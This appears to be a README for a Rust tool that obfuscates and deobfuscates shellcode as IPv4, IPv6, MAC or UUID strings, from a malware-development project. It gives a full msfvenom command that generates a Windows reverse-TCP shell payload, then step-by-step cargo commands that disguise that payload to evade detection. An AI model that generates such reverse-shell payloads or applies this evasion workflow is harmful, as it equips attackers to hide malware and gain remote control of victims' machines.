With this code you can obfuscate and deobfuscate shellcode using Ipv4, Ipv6, MAC, UUiD formats.
Example: msfvenom -p windows/shell/reverse_tcp lhost=eth0 lport=4444 -f raw -o payload.bin
cargo run -- -f <file> -t <technique> -o <operation>
cargo run
cargo run -- -f .\payload.bin -t ipv4 -o obfuscate
cargo run -- -f .\obfuscated_ipv4.txt -t ipv4 -o deobfuscate
Obfuscate Using IPv4
cargo run -- -f .\payload.bin -t ipv4 -o obfuscate
Obfuscate Using IPv6
cargo run -- -f .\payload.bin -t ipv6 -o obfuscate
Obfuscate Using MAC
cargo run -- -f .\payload.bin -t mac -o obfuscate
Obfuscate Using UUID
cargo run -- -f .\payload.bin -t uuid -o obfuscate
Deobfuscate Using IPv4
cargo run -- -f .\obfuscated_ipv4.txt -t ipv4 -o deobfuscate
Deobfuscate Using IPv6
cargo run -- -f .\obfuscated_ipv6.txt -t ipv6 -o deobfuscate
Deobfuscate Using MAC
cargo run -- -f .\obfuscated_mac.txt -t mac -o deobfuscate
Deobfuscate Using UUID
cargo run -- -f .\obfuscated_uuid.txt -t uuid -o deobfuscate
Thanks for the Wonderful Content and Resource by Maldev Academy.
For more Malware POC and codes visit Rust for Malware Development Repository.
By @5mukx